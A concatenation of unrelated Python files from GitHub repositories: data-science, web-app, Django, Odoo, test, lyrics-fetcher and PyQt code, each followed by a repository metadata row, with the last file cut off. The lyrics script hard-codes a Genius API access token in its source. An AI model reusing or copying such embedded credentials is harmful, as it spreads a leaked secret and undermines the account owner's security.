cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n , scoring = r2)
print(cross_validations)
print(np.mean(cross_validations), np.std(cross_validations) / np.sqrt(cross_val_n))
print('------')
# Repeat of the same CV call (duplicate output).
cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=5, scoring = r2)
print(cross_validations)

## Check cross-validation accuracy: out-of-fold predictions on the train set.
cross_validations_pred = cross_val_predict(estimator = model_rf, X = X_train, y = y_train, cv=5)
get_ipython().run_line_magic('matplotlib', 'inline')  # notebook-only magic; fails outside IPython

## Scatterplot: cross-validated predictions vs observed deltaS.
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(cross_validations_pred, y_train)
ax.set_xlabel('Predicted deltaS (random forest, cross-validations)', fontsize = 20)
ax.set_ylabel('Observed deltaS', fontsize = 20)

# NOTE(review): stray notebook cell echo — this expression's value is unused.
cross_validations_pred[1, ]

# Enlarge tick labels, then render.
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(14)
plt.show()

# Figures for the accuracy of the predictions and selecting the best variables
get_ipython().run_line_magic('matplotlib', 'inline')

## Scatterplot: held-out test-set predictions vs observed effects.
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(pred_test_rf, y_test)
ax.set_xlabel('Predicted fitness effects (random forest)', fontsize = 20)
ax.set_ylabel('Observed fitness effects', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(14)
plt.show()

## Save the corresponding files for predictions on validation set and test set
## Results with all variables
df_pred_test = pd.DataFrame(list(zip(y_test, pred_test_rf)), columns = ['test_data', 'pred_data'])
df_pred_test.to_csv('../../Data/Random_forest_results/diffNorm_ara0.2_ara0.01/pred_rf_allVariables.txt', sep = '\t')

## Results of predictions in the cross-validation
df_pred_crossval = pd.DataFrame(list(zip(y_train, cross_validations_pred)), columns = ['test_data', 'pred_data'])
df_pred_crossval.to_csv('../../Data/Random_forest_results/diffNorm_ara0.2_ara0.01/crossval_rf_allVariables.txt', sep = '\t')
# ## Feature selection
# Define a function to use permutation to estimate relative importances
def r2(rf, X_train, y_train):
    """Scorer: coefficient of determination (R^2) of *rf* on the given data."""
    predictions = rf.predict(X_train)
    return r2_score(y_train, predictions)
# Use permutation to estimate relative importances
perm_imp_rfpimp = permutation_importances(model_rf, X_train, y_train, r2)
get_ipython().run_line_magic('matplotlib', 'inline')
fig = plt.figure()
ax = fig.add_axes([0,0,1,3])
ax.barh(list(perm_imp_rfpimp.index), perm_imp_rfpimp['Importance'])
ax.set_xlabel('Relative importance', fontsize = 20)
ax.set_ylabel('Feature', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(14)
plt.show()
# Keep only features at least as important as the random control variable.
best_features = perm_imp_rfpimp[perm_imp_rfpimp['Importance'] >= perm_imp_rfpimp['Importance']['random_var']]
best_features
new_X = X[list(best_features.index)]
# Train a new random forest with the selected variables and the random variable
X_train,X_test,y_train,y_test =train_test_split(new_X,Y,test_size=0.2, random_state = 100)
model_rf = RandomForestRegressor(n_estimators=500, oob_score=True, random_state=100)
model_rf.fit(X_train, y_train)
pred_train_rf= model_rf.predict(X_train)
print('Mean squared error (train):', np.sqrt(mean_squared_error(y_train,pred_train_rf)))
print('R2 score (train):', r2_score(y_train, pred_train_rf))
pred_test_rf = model_rf.predict(X_test)
print('Mean squared error (test):', np.sqrt(mean_squared_error(y_test,pred_test_rf)))
print('R2 score (test):', r2_score(y_test, pred_test_rf))
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(pred_test_rf, y_test)
ax.set_xlabel('Predicted fitness effects (random forest)', fontsize = 20)
ax.set_ylabel('Observed fitness effects', fontsize = 20)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(14)
plt.show()
# Cross-validation
cross_val_n = 5
print('Five-fold cross validation of the random forest model:')
cross_validations = cross_val_score(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n, scoring = r2)
print(cross_validations)
print(np.mean(cross_validations), np.std(cross_validations) / np.sqrt(cross_val_n))
print('------')
cross_validations_pred = cross_val_predict(estimator = model_rf, X = X_train, y = y_train, cv=cross_val_n)
get_ipython().run_line_magic('matplotlib', 'inline')
## Scatterplot of the random forest predictions
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.scatter(cross_validations_pred, y_train)
ax.set_xlabel('Predicted deltaS (random forest, cross-validations)', fontsize = 20)
ax.set_ylabel('Observed deltaS', fontsize = 20)
# NOTE(review): no-op leftover from an interactive cell.
cross_validations_pred[1, ]
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(14)
plt.show()
# Since this is a simpler model, we can test relative importance by leaving one
# variable out and retraining
def dropcol_importances(rf, X_train, y_train):
    """Drop-column importance: OOB-score loss when each feature is removed.

    Adapted from https://explained.ai/rf-importance/index.html#intro.
    Returns a DataFrame indexed by 'Feature', sorted ascending by 'Importance'.
    """
    # Baseline: the model fitted on the full feature set.
    reference = clone(rf)
    reference.random_state = 100
    reference.fit(X_train, y_train)
    baseline = reference.oob_score_
    losses = []
    for column in X_train.columns:
        reduced = X_train.drop(column, axis=1)
        candidate = clone(rf)
        candidate.random_state = 100
        candidate.fit(reduced, y_train)
        # Positive value => removing the column hurts the OOB score.
        losses.append(baseline - candidate.oob_score_)
    table = pd.DataFrame(
        data={'Feature': X_train.columns,
              'Importance': np.array(losses)})
    return table.set_index('Feature').sort_values('Importance', ascending=True)
importances_drop_col = dropcol_importances(model_rf, X_train, y_train)
get_ipython().run_line_magic('matplotlib', 'inline')
fig = plt.figure()
ax = fig.add_axes([0,0,1,1])
ax.barh(list(importances_drop_col.index), importances_drop_col['Importance'])
ax.set_xlabel('Relative importance', fontsize = 16)
ax.set_ylabel('Feature', fontsize = 16)
for item in (ax.get_xticklabels() + ax.get_yticklabels()):
    item.set_fontsize(12)
plt.show()
### Save the tables
## Relative importances permutation (all)
perm_imp_rfpimp.to_csv('../../Data/Random_forest_results/model_diffFit_permImportances_allVariables.txt', sep = '\t')
## Predictions for test set(best variables)
df_pred_test_best = pd.DataFrame(list(zip(y_test, pred_test_rf)), columns = ['test_data', 'pred_data'])
df_pred_test_best.to_csv('../../Data/Random_forest_results/pred_rf_bestVariables.txt', sep = '\t')
## Predictions for cross-validation (best variables)
df_pred_crossval_best = pd.DataFrame(list(zip(y_train, cross_validations_pred)), columns = ['test_data', 'pred_data'])
df_pred_crossval_best.to_csv('../../Data/Random_forest_results/crossval_rf_bestVariables.txt', sep = '\t')
## Relative importances drop column (best variables)
importances_drop_col.to_csv('../../Data/Random_forest_results/model_diffFit_dropCol_bestVariables.txt', sep = '\t')
| Landrylab/DfrB1_DMS_2022 | Scripts/Random_forest/Random_forest_DfrB1_DMS.py | Random_forest_DfrB1_DMS.py | py | 10,422 | python | en | code | 0 | github-code | 36 |
16185502227 | import os
from sanic import Sanic
from sanic_session import Session, AIORedisSessionInterface
from ..config import config, log_config
from ..container import Container
from ..adapter.blueprint import handle_exception, message_blueprint,\
post_blueprint, file_blueprint, user_blueprint
# Ensure the data directory exists before the app mounts static files into it.
os.makedirs(config['DATA_PATH'], 0o755, True)
app = Sanic(config['NAME'].capitalize(), log_config=log_config)
app.config.update(config)
# Route every unhandled exception through the shared JSON error handler.
app.error_handler.add(Exception, handle_exception)
# Serve uploaded files directly; stream to avoid loading large files in memory.
app.static('/files', os.path.join(config['DATA_PATH'], config['UPLOAD_DIR']),
           stream_large_files=True)
app.blueprint(message_blueprint)
app.blueprint(post_blueprint)
app.blueprint(file_blueprint)
app.blueprint(user_blueprint)
@app.listener('before_server_start')
async def server_init(app, loop):
    """Build the service container and wire Redis-backed sessions before serving."""
    container = Container(config, log_config)
    await container.on_init
    # Sessions are stored in the container's cache (Redis) with a configured TTL.
    Session(app, AIORedisSessionInterface(
        container.cache, expiry=config['SESSION_EXPIRY']))
@app.listener('after_server_stop')
async def server_clean(app, loop):
    """Release container resources (connections, pools) on shutdown."""
    await Container().clean()
# Run the development server when executed directly; all knobs come from config.
if __name__ == '__main__':
    app.run(host=config['HOST'], port=config['PORT'], debug=config['DEBUG'],
            auto_reload=config['AUTO_RELOAD'], access_log=config['ACCESS_LOG'],
            workers=config['WORKERS'])
| jaggerwang/sanic-in-practice | weiguan/api/app.py | app.py | py | 1,296 | python | en | code | 42 | github-code | 36 |
43361270196 | from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from rest_framework.request import Request
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from api.utils import paginate
from message.models import Message
from message.serializer import MessageSerializer, MessageUserSerializer
from people.models import Friend
from user.models import User
from django.db.models import Q
from django.utils import timezone
@api_view(["POST"])
@permission_classes([IsAuthenticated])
def send_message(request:Request, pk):
    """Create a message from the authenticated user to user *pk*.

    Returns the serialized message on success. An empty/missing "message"
    field is rejected with HTTP 400 (previously this returned HTTP 200,
    which clients could not distinguish from success).
    """
    receiver=get_object_or_404(User, pk=pk)
    user = request.user
    content = request.data.get("message")
    if not content:
        return Response("Provide message", status=400)
    message = Message.objects.create(
        sender=user,
        receiver=receiver,
        content=content
    )
    return Response(MessageSerializer(message).data)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def get_message(request, pk):
    """Return the paginated message history between the caller and user *pk*,
    newest first."""
    other = get_object_or_404(User, pk=pk)
    # Messages flowing in either direction between the two users.
    between = (Q(sender=other, receiver=request.user)
               | Q(sender=request.user, receiver=other))
    messages = Message.objects.filter(between).order_by("-dateSend")
    paginated = paginate(messages, request, MessageSerializer)
    return Response(paginated)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def get_user_last_message(request:Request):
    """For each friend of the caller, return the latest exchanged message
    (or a placeholder when the pair has never talked), paginated."""
    me = request.user
    summaries = []
    for friendship in Friend.objects.filter(user1=me):
        other = friendship.user2
        latest = Message.objects.filter(
            Q(sender=me, receiver=other) | Q(sender=other, receiver=me)
        ).order_by("-dateSend").first()
        if latest is None:
            # No conversation yet: synthesize a prompt entry dated "now".
            summaries.append({
                "friend": other,
                "content": "You can send message to your friend",
                "dateSend": timezone.now(),
                "lastSenderMe": False
            })
        else:
            summaries.append({
                "friend": other,
                "content": latest.content,
                "dateSend": latest.dateSend,
                "lastSenderMe": latest.sender.id == me.id
            })
    paginated = paginate(summaries, request, MessageUserSerializer)
    return Response(paginated)
8755135805 | # -*- coding: utf-8 -*-
import logging
from odoo import models, fields, api, _
from odoo.exceptions import UserError, ValidationError
from odoo.tools.safe_eval import safe_eval
_logger = logging.getLogger(__name__)
class DeliveryCarrier(models.Model):
    """Extend delivery.carrier with purchase-side pricing (Odoo legacy API)."""
    _inherit = 'delivery.carrier'
    # Flags restricting where this carrier may be used (sale vs. purchase).
    of_use_sale = fields.Boolean(string=u"Utilisable à la vente")
    of_use_purchase = fields.Boolean(string=u"Utilisable à l'achat")
    of_supplier_ids = fields.Many2many(
        comodel_name='res.partner', string="Fournisseurs", domain="[('supplier','=',True)]")
    @api.one
    def get_price(self):
        """Fallback pricing: if the sale-side price is falsy, try to price the
        purchase order referenced by context key 'purchase_id'."""
        super(DeliveryCarrier, self).get_price()
        if not self.price:
            PurchaseOrder = self.env['purchase.order']
            purchase_id = self.env.context.get('purchase_id', False)
            if purchase_id:
                purchase = PurchaseOrder.browse(purchase_id)
                if self.delivery_type not in ['fixed', 'base_on_rule']:
                    computed_price = 0.0
                else:
                    carrier = self.verify_carrier(purchase.partner_id)
                    if carrier:
                        try:
                            computed_price = carrier.get_price_available_purchase(purchase)
                            self.available = True
                        except UserError as e:
                            # No suitable delivery method found, probably configuration error
                            _logger.info("Carrier %s: %s", carrier.name, e.name)
                            computed_price = 0.0
                    else:
                        computed_price = 0.0
                # Apply the carrier margin as a percentage markup.
                self.price = computed_price * (1.0 + (float(self.margin) / 100.0))
    @api.multi
    def get_price_available_purchase(self, purchase):
        """Compute delivery price for *purchase* from its totals.

        Delivery lines are excluded from weight/volume/quantity and their
        amount is subtracted from the order total; the total is converted to
        the company currency before pricing.
        """
        self.ensure_one()
        weight = volume = quantity = 0
        total_delivery = 0.0
        for line in purchase.order_line:
            if line.state == 'cancel':
                continue
            if line.of_is_delivery:
                total_delivery += line.price_total
            if not line.product_id or line.of_is_delivery:
                continue
            # Quantity expressed in the product's reference unit of measure.
            qty = line.product_uom._compute_quantity(line.product_qty, line.product_id.uom_id)
            weight += (line.product_id.weight or 0.0) * qty
            volume += (line.product_id.volume or 0.0) * qty
            quantity += qty
        total = (purchase.amount_total or 0.0) - total_delivery
        total = purchase.currency_id.with_context(date=purchase.date_order).compute(total, purchase.company_id.currency_id)
        return self.get_price_from_picking(total, weight, volume, quantity)
    def get_difference_from_picking(self, total, weight, volume, quantity):
        """Evaluate the first matching price rule and return its price
        (0.0 when no rule matches)."""
        self.ensure_one()
        price = 0.0
        price_dict = {'price': total, 'volume': volume, 'weight': weight, 'wv': volume * weight, 'quantity': quantity}
        for line in self.price_rule_ids:
            # Rule condition, e.g. "weight<=10", evaluated against price_dict.
            test = safe_eval(line.variable + line.operator + str(line.max_value), price_dict)
            if test:
                price = line.list_base_price + line.list_price * price_dict[line.variable_factor]
                break
        return price
| odof/openfire | of_delivery/models/delivery_carrier.py | delivery_carrier.py | py | 3,214 | python | en | code | 3 | github-code | 36 |
# Read the integers, one per line.
A = [int(line) for line in open('17-4.txt')]
print(A)
# Keep values divisible by 31, 47 or 53 whose remainders mod 3 and mod 5 agree.
matching = [value for value in A
            if (value % 31 == 0 or value % 47 == 0 or value % 53 == 0)
            and value % 3 == value % 5]
count = len(matching)
# 10001 mirrors the original sentinel (inputs are assumed <= 10000).
mini = min(matching, default=10001)
print(count, mini)
| alex3287/ege | lessons_online_1/lesson_4/task_3.py | task_3.py | py | 240 | python | vi | code | 0 | github-code | 36 |
33826107895 | from src.track_orders import TrackOrders
import unittest
from unittest.mock import patch, mock_open, call
# (customer, dish, weekday) rows mimicking the orders CSV fixture.
mock_csv = [
    ["eduarda", "pizza", "sexta-feira"],
    ["eduarda", "rocambole", "sexta-feira"],
    ["joao", "rocambole", "sexta-feira"],
    ["eduarda", "coxinha", "segunda-feira"],
    ["arnaldo", "misto-quente", "sexta-feira"],
    ["jose", "rocambole", "sabado"],
    ["eduarda", "rocambole", "sexta-feira"],
    ["eduarda", "rocambole", "sexta-feira"],
    ["joao", "rocambole", "sexta-feira"]
]
class Testing_TrackOrders(unittest.TestCase):
    """Unit tests for TrackOrders, driven by the mock_csv fixture above."""
    def test_init(self):
        """A fresh tracker starts with empty sales, days and orders."""
        track = TrackOrders()
        assert {} == track.all_sales
        assert set() == track.days
        assert set() == track.orders
    def test_add_new_order(self):
        """Adding every fixture row builds the expected aggregates."""
        track = TrackOrders()
        for name, meal, day in mock_csv:
            track.add_new_order(name, meal, day)
        assert {
            "arnaldo": {"days": {"sexta-feira": 1},
                        "order": {"misto-quente": 1}},
            "joao": {"days": {"sexta-feira": 2}, "order": {"rocambole": 2}},
            "jose": {"days": {"sabado": 1}, "order": {"rocambole": 1}},
            "eduarda": {"days": {"segunda-feira": 1, "sexta-feira": 4},
                        "order": {"coxinha": 1, "rocambole": 3, "pizza": 1}}
        } == track.all_sales
        assert {
            "sabado", "segunda-feira", "sexta-feira"
        } == track.days
        self.assertEqual(set(
            {"coxinha", "rocambole", "misto-quente", "pizza"}
        ), track.orders)
    def test_get_most_ordered_dish_per_costumer(self):
        track = TrackOrders()
        for name, meal, day in mock_csv:
            track.add_new_order(name, meal, day)
        result = track.get_most_ordered_dish_per_costumer("eduarda")
        assert result == "rocambole"
    def test_get_order_frequency_per_costumer(self):
        """Frequency is the order count for the dish, 0 when never ordered."""
        track = TrackOrders()
        for name, meal, day in mock_csv:
            track.add_new_order(name, meal, day)
        result1 = track.get_order_frequency_per_costumer(
            "eduarda", "rocambole")
        result2 = track.get_order_frequency_per_costumer("eduarda", "jiló")
        assert result1 == 3
        assert result2 == 0
    def test_get_never_orderes_per_costumer(self):
        track = TrackOrders()
        for name, meal, day in mock_csv:
            track.add_new_order(name, meal, day)
        result = track.get_never_ordered_per_costumer("eduarda")
        assert result == {"misto-quente"}
    def test_get_days_never_visited_per_costumer(self):
        track = TrackOrders()
        for name, meal, day in mock_csv:
            track.add_new_order(name, meal, day)
        result = track.get_days_never_visited_per_costumer("eduarda")
        assert result == {"sabado"}
# Obtenha, no mínimo, 90% de cobertura (achieve at least 90% test coverage)
| EddyeBoy27/restaurant-orders | tests/test_track_orders.py | test_track_orders.py | py | 2,826 | python | en | code | 0 | github-code | 36 |
17736050506 | import re
import requests
import json
import osascript
import hashlib
from bs4 import BeautifulSoup
def main():
    """Fetch the currently playing song, look up its lyrics on Genius and
    print them (for the Touch Bar); fall back to a music quote otherwise."""
    # Get browser and player data via AppleScript
    code, output, err = getBrowserAndPlayerData()
    # print(output,err)
    current_data = output.split(', ')
    # Separate output: first four fields are the player record, rest is browser.
    player_data = current_data[0:4]
    browser_data = current_data[4:]
    # Process player and browser data
    player_type, player_artist, player_song, player_state = processPlayerData(
        player_data)
    browser_type, browser_artist, browser_song, browser_state = processBrowserData(
        browser_data)
    # Determine priority, player or browser
    priority = (playerOrBrowser(
        player_type, player_state, browser_type, browser_state))
    # print(priority)
    if priority == "player":
        artist = player_artist
        song = player_song
    elif priority == "browser":
        artist = browser_artist
        song = browser_song
    else:
        # Nothing is playing: print nothing.
        return
    # Remove extra information from title
    song = cleanSong(song)
    artist_1, artist_2 = multipleArtistCheck(artist)
    # Prepare array of artists
    artist_array = [artist, artist_1, artist_2]
    # print('\nPlayer Full Artist: ' + player_artist + '\nPlayer Artist 1: ' + player_artist_1 + '\nPlayer Artist 2: ' + player_artist_2 + '\nPlayer Song: ' + player_song)
    # Access Genius API 'https://docs.genius.com'
    # NOTE(review): hard-coded API token checked into source — consider moving
    # it to an environment variable.
    accesstoken = 'ORYExHGED-rUDNu6wEqCt42NCg9nFuBiCiVKAYkjSrS6aQ1RHdyyjp5gl7GlpXZH'
    headers = {'Authorization': 'Bearer ' + accesstoken, 'User-Agent': 'Kashi',
               'Accept': 'application/json', 'Host': 'api.genius.com'}
    params = {'q': artist + ' ' + song}
    hits = requests.get('https://api.genius.com/search',
                        params=params, headers=headers).json()['response']['hits']
    # for hit in hits:
    # print ("Artist: " + hit['result']['primary_artist']['name'] + "\nSong: " + hit['result']['full_title'])
    hitcount = 0
    if len(hits) > 0:
        # Get info from top search hit that contains player artist
        while hitcount < len(hits) - 1 and not any([x in hits[hitcount]['result']['primary_artist']['name'].lower() for x in artist_array]):
            hitcount += 1  # Go to next hit
        genius_artist = hits[hitcount]['result']['primary_artist']['name'].lower(
        )
        genius_song = hits[hitcount]['result']['full_title'].lower()
        genius_url = hits[hitcount]['result']['url']
        # print('\nGenius Artist: ' + genius_artist + '\nGenius Song: ' + genius_song + '\nGenius URL: ' + genius_url + '\n')
        if any([y in genius_artist for y in artist_array]):
            # Parse Genius HTML with BeautifulSoup and format lyrics
            lyrics = parseAndFormat(genius_url)
            # FINAL STEP: Print to touch bar
            print(lyrics)
        else:
            # Print music quote if lyrics not found
            printWisdom(song)
    else:
        printWisdom(song)
    return
def getBrowserAndPlayerData():
    """Query Spotify/Music and Chrome/Safari via AppleScript.

    Returns osascript's (code, output, err); the output is a flat
    comma-separated record: 4 player fields followed by 2 browser fields,
    with "none" placeholders when an app is not running.
    """
    applescript = '''
    on run
        if application "Spotify" is running then
            tell application "Spotify"
                set playerData to {"Spotify", artist of current track, name of current track, player state}
            end tell
        else if application "Music" is running then
            tell application "Music"
                set playerData to {"Music", artist of current track, name of current track, player state}
            end tell
        else
            set playerData to {"none", "none", "none", "none"}
        end if
        if (application "Google Chrome" is running) and (exists (front window of application "Google Chrome")) then
            tell application "Google Chrome"
                set browserData to {"Chrome", title of active tab of front window}
            end tell
        else if (application "Safari" is running) and (exists (front window of application "Safari")) then
            tell application "Safari"
                set browserData to {"Safari", name of current tab of front window}
            end tell
        else
            set browserData to {"none", "none"}
        end if
        set currentData to {playerData, browserData}
        return currentData
    end run
    '''
    return osascript.run(applescript, background=False)
def processBrowserData(browser_data):
    """Derive (browser, artist, song, state) from a browser tab title.

    Only YouTube tabs whose remaining title contains " - " (i.e. looks like
    "Artist - Song") are treated as playing music. Mutates browser_data[1]
    when the YouTube suffix is stripped, mirroring the original behavior.
    """
    browser_artist = browser_song = ""
    browser_state = 'paused'
    if " - YouTube" in browser_data[1]:
        # Drop the trailing " - YouTube" suffix (10 characters).
        browser_data[1] = browser_data[1][0:-10]
        if " - " in browser_data[1]:
            # Text up to the first dash is the artist, after the last dash the song.
            browser_artist = re.search(
                r'^([^\-]+)', browser_data[1]).group(0).strip().lower()
            browser_song = re.search(
                r'([^\-]+)$', browser_data[1]).group(0).strip().lower()
            browser_state = 'playing'
    return browser_data[0], browser_artist, browser_song, browser_state
def processPlayerData(player_data):
    """Normalize raw AppleScript player output into (type, artist, song, state)."""
    player_type = player_data[0]
    # Re-join artist/title fields that the comma-separated output split apart.
    player_data = normalizeCommas(player_type, player_data)
    return (player_type,
            player_data[1].lower(),
            player_data[2].lower(),
            player_data[3].lower())
def playerOrBrowser(player_type, player_state, browser_type, browser_state):
    """Decide which audio source wins: a playing player beats a playing browser.

    Returns "player", "browser", or None when neither is playing.
    """
    if player_state == "playing":
        return "player"
    if browser_state == "playing":
        return "browser"
    return None
def normalizeCommas(engine, player_data):
    """Merge fields split on commas until the record has at most 5 entries.

    Apple Music artist names overflow into index 1/2; Spotify song titles
    overflow into index 2/3. Mutates and returns *player_data*.
    """
    merge_at = 1 if engine == 'Music' else 2
    while len(player_data) > 5:
        player_data[merge_at] = player_data[merge_at] + ', ' + player_data[merge_at + 1]
        player_data.pop(merge_at + 1)
    return player_data
def cleanSong(songtitle):
    """Strip trailing " - ..." annotations, then parenthesised and bracketed
    text (e.g. "(Remix)", "[Live]") from a song title."""
    for noise in (r' -.*$', r' \(.*\)', r' \[.*\]'):
        songtitle = re.sub(noise, '', songtitle)
    return songtitle
def multipleArtistCheck(artist):
    """Split an "A & B" credit into its two artists.

    Returns ('n/a', 'n/a') when no '&' is present (solo act).
    """
    if '&' not in artist:
        return 'n/a', 'n/a'
    first = re.sub(r' \&.*$', '', artist)
    second = re.sub(r'^.*\& ', '', artist)
    return first, second
def parseAndFormat(url):
    """Download a Genius lyrics page and flatten the lyrics to one line.

    Section headers in brackets and parentheticals are removed, blank lines
    collapsed, and line breaks replaced by comma separators with punctuation
    cleanup for compact display.
    """
    source_soup = BeautifulSoup(requests.get(
        url).text, 'html.parser')  # Parse HTML
    # Get text from the lyrics <div>
    lyricstext = source_soup.find('div', class_='lyrics').get_text()
    # Remove song sections in brackets
    lyricstext = re.sub(r'\[.*\n*.*\]', '', lyricstext).strip()
    # Remove parentheticals
    lyricstext = re.sub(r'\(.*\n*.*\)', '', lyricstext).strip()
    while '\n\n' in lyricstext:  # Line breaks, flatten, and replace
        lyricstext = lyricstext.replace('\n\n', '\n')
    lyricstext = lyricstext.replace('\n', ', ').replace('?,', '?').replace('!,', '!').replace(' ,', ',').replace(
        ' .', '.').replace('.,', '.').replace(',.', '.').replace('...', '..').replace('...', '..').replace('  ', ' ')
    return lyricstext
def printWisdom(player_song):
wisdom = [
'\"Music expresses that which cannot be said and on which it is impossible to be silent.\" - Victor Hugo ',
'\"If music be the food of love, play on.\" - William Shakespeare ',
'\"Where words fail, music speaks.\" - Hans Christian Anderson ',
'\"One good thing about music, when it hits you, you feel no pain.\" - Bob Marley ',
'\"And those who were seen dancing were thought to be insane by those who could not hear the music.\" - Nietzsche ',
'\"There is geometry in the humming of the strings, there is music in the spacing of the spheres.\" - Pythagoras ',
'\"You are the music while the music lasts.\" - T. S. Eliot ',
'\"After silence, that which comes nearest to expressing the inexpressible is music.\" - Aldous Huxley '
]
# Hash songname for constant quote when script refires
songhash = hashlib.sha224(player_song.encode('utf-8')).hexdigest()
songhash_int = int(songhash, base=16)
# Reduce hash to within array length
print(wisdom[(songhash_int % (len(wisdom) + 1)) - 1])
# Script entry point.
if __name__ == '__main__':
    main()
| jimu-gh/Kashi | kashi.py | kashi.py | py | 8,841 | python | en | code | 50 | github-code | 36 |
def findReplaceString(S: str, indexes, sources, targets) -> str:
    """Apply simultaneous find-and-replace operations on *S* (LeetCode 833).

    For each j, if S starts with sources[j] at position indexes[j], that
    occurrence is replaced by targets[j]; non-matching operations are
    skipped. All matches are defined on the ORIGINAL string, so edits are
    applied right-to-left to keep pending offsets valid.

    The previous implementation ignored *indexes*, located sources[j] by its
    first character anywhere in S, and stopped after a single replacement —
    e.g. its own example ("abcd", [0, 2], ["a", "cd"], ["eee", "ffff"])
    produced "eeebcd" instead of "eeebffff".
    """
    if not S or not indexes or not sources or not targets:
        return S
    # Highest index first: earlier replacements never shift later offsets.
    for idx, src, tgt in sorted(zip(indexes, sources, targets), reverse=True):
        if S[idx:idx + len(src)] == src:
            S = S[:idx] + tgt + S[idx + len(src):]
    return S
# Sample input from the problem statement; expected result: "eeebffff".
S = "abcd"
indexes = [0,2]
sources = ["a","cd"]
targets = ["eee","ffff"]
36132831318 | """
Dialog for editing first arrivals.
"""
from PyQt5 import QtCore, QtGui, QtWidgets
import numpy as np
import pyqtgraph as qtg
class FirstArrivalDlg(QtWidgets.QDialog):
    """Dialog for reviewing and editing first-arrival picks of a measurement.

    Shows one trace plot per receiver channel with an automatic pick (green)
    and a draggable manual pick (blue); edits are written back to the
    inversion configuration when the dialog closes.
    """
    def __init__(self, measurement, genie, parent=None):
        super().__init__(parent)
        self._measurement = measurement
        self.genie = genie
        # All traces of a measurement share one sampling rate.
        self._sampling_rate = self._measurement.data["data"][0].stats.sampling_rate
        title = "First arrival editor - source: {}, file: {}".format(self._measurement.source_id, self._measurement.file)
        self.setWindowTitle(title)
        grid = QtWidgets.QGridLayout(self)
        # plot axis wiget: a shared time axis shown above the trace plots
        qtg.setConfigOptions(background="w", foreground="k")
        graphic_axis_wiget = qtg.GraphicsLayoutWidget(self)
        plot = graphic_axis_wiget.addPlot(enableMenu=False)
        plot.setLabel('left', "")
        plot.setMouseEnabled(False, False)
        x_max = len(self._measurement.data["data"][0].data) / self._sampling_rate
        plot.setXRange(0, x_max * 1.001, padding=0)
        plot.getAxis('bottom').setStyle(showValues=False)
        plot.getAxis('bottom').hide()
        plot.getAxis('left').setStyle(showValues=False)
        plot.getAxis('left').setHeight(0)
        plot.hideButtons()
        plot.setLabel('top', "Time", units='s')
        plot.getAxis('top').setStyle(showValues=True)
        plot.setLabel('left', " ")
        scroll = QtWidgets.QScrollArea()
        scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        scroll.verticalScrollBar().setVisible(False)
        scroll.setWidgetResizable(True)
        grid.addWidget(scroll, 0, 0, 1, 6)
        sw=QtWidgets.QWidget()
        sw.setMaximumHeight(80)
        scroll.setMaximumHeight(85)
        scroll.setMinimumHeight(85)
        scroll.setWidget(sw)
        hbox = QtWidgets.QHBoxLayout()
        sw.setLayout(hbox)
        label = QtWidgets.QLabel("Use")
        label.setMinimumWidth(30)
        label.setMaximumWidth(30)
        hbox.addWidget(label)
        hbox.addWidget(graphic_axis_wiget)
        # plot wiget: scrollable column of per-channel trace plots
        self._graphic_wiget = qtg.GraphicsLayoutWidget(self)
        # Parallel per-channel lists: plot, manual line, auto line, "use" checkbox.
        self._plot_list = []
        self._line_list = []
        self._line_auto_list = []
        self._checkbox_list = []
        scroll = QtWidgets.QScrollArea()
        scroll.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
        scroll.setWidgetResizable(True)
        grid.addWidget(scroll, 1, 0, 3, 6)
        sw=QtWidgets.QWidget()
        scroll.setWidget(sw)
        hbox = QtWidgets.QHBoxLayout()
        sw.setLayout(hbox)
        self._vbox = QtWidgets.QVBoxLayout()
        hbox.addLayout(self._vbox)
        hbox.addWidget(self._graphic_wiget)
        # Legend explaining the pick-line colors.
        lay = QtWidgets.QHBoxLayout()
        label = QtWidgets.QLabel("Auto")
        label.setStyleSheet("QLabel { color: #00ff00;}")
        lay.addWidget(label)
        label = QtWidgets.QLabel("Manual")
        label.setStyleSheet("QLabel { color : blue; }")
        lay.addWidget(label)
        lay.addStretch()
        grid.addLayout(lay, 6, 0)
        self._close_button = QtWidgets.QPushButton("Close", self)
        self._close_button.clicked.connect(self.reject)
        grid.addWidget(self._close_button, 6, 5)
        self.setLayout(grid)
        self.setMinimumSize(500, 250)
        self.resize(1000, 800)
        self._create_plot()
    def _create_plot(self):
        """Build one normalized trace plot per receiver channel, with auto
        (green, fixed) and manual (blue, draggable) pick lines."""
        row = 0
        meas = self._measurement
        data = meas.data["data"]
        for i in range(meas.channel_start - 1, meas.channel_start + abs(meas.receiver_stop - meas.receiver_start)):
            row += 1
            trace = data[i]
            # Receiver numbering may run up or down the spread.
            inc = 1 if meas.receiver_stop > meas.receiver_start else -1
            title = "receiver: {}".format(meas.receiver_start + i * inc)
            plot = self._graphic_wiget.addPlot(row=row, col=1, enableMenu=False)
            plot.setLabel('left', title)
            plot.setMouseEnabled(False, False)
            self._plot_list.append(plot)
            checkbox = QtWidgets.QCheckBox()
            checkbox.setMinimumSize(30, 150)
            checkbox.setMaximumWidth(30)
            self._checkbox_list.append(checkbox)
            self._vbox.addWidget(checkbox)
            x_max = len(trace.data) / self._sampling_rate
            x = np.linspace(0, x_max, len(trace.data))
            # Normalize amplitudes to [-1, 1] so all traces share one scale.
            y = trace.data / np.max(np.abs(trace.data))
            plot.plot(x, y, pen="r")
